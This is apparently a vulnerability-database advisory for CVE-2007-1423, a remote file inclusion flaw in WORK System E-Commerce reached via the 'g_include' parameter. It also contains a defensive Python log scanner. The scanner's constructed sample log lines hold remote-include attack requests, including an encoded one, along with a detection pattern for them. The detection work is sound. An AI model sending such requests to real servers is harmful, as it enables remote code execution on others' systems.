Remote File Inclusion Vulnerability in WORK System E-Commerce Software
CVE-2007-1423

Currently unrated

Key Information:

Vendor
CVE Published: 13 March 2007

Badges

Exploit Exists, Public PoC

What is CVE-2007-1423?

Multiple remote file inclusion vulnerabilities exist in WORK System E-Commerce versions 3.0.5 and earlier, allowing attackers to execute arbitrary PHP code. The flaws are reached through the 'g_include' parameter of 'include/include_top.php' and some other PHP scripts, and exploitation can compromise affected systems, putting users and their data at risk. Users should update their software to the latest version to mitigate these vulnerabilities.
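For triage on a host that ran an affected version, the following added example (not part of the advisory or the vendor's code) scans web access-log lines for a 'g_include' query parameter whose value points at a remote resource instead of a local directory. It assumes Apache common/combined log format; the log lines, addresses and the `/shop/` prefix are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client, request target and status from a common/combined access-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A value that starts with a scheme/stream wrapper ("x:"), "//" or a UNC prefix,
# i.e. something other than a relative local include directory.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)

def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding a bounded number of times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_g_include_hits(lines):
    """Return (client_ip, script_path, decoded_value, status) per suspicious request.

    Only query-string parameters are visible in access logs; values sent in a
    request body or cookie need application or WAF logging instead.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith(".php"):
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_unquote(value)  # parse_qsl already decoded once
            if name == "g_include" and REMOTE_RE.match(value):
                hits.append((m.group("ip"), parts.path, value, int(m.group("status"))))
    return hits

# Constructed sample input (documentation address ranges, reserved hostname).
SAMPLE_LOG = [
    '198.51.100.23 - - [13/Mar/2007:10:01:02 +0000] "GET /shop/include/include_top.php?g_include=http://example.invalid/a.txt HTTP/1.1" 200 512',
    '198.51.100.23 - - [13/Mar/2007:10:01:09 +0000] "GET /shop/include/include_top.php?g_include=%2568ttp%253A%252F%252Fexample.invalid%252Fa.txt HTTP/1.1" 200 498',
    '192.0.2.10 - - [13/Mar/2007:10:02:00 +0000] "GET /shop/index.php?page=cart HTTP/1.1" 200 2048',
    '192.0.2.10 - - [13/Mar/2007:10:02:05 +0000] "GET /shop/include/include_top.php?g_include=include/ HTTP/1.1" 200 120',
]
```

A hit with a 200 status only shows that the script answered, so each one should be followed up on the host (web root changes, outbound connections at that time) before drawing conclusions.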

Exploit Proof of Concept (PoC)

PoC code is written by security researchers to demonstrate that the vulnerability can be exploited. PoC code is also a key component for weaponization, which could lead to ransomware.

EPSS Score

5% chance of being exploited in the next 30 days.

Timeline

  • Public PoC available

  • Exploit known to exist

  • Vulnerability published

  • Vulnerability Reserved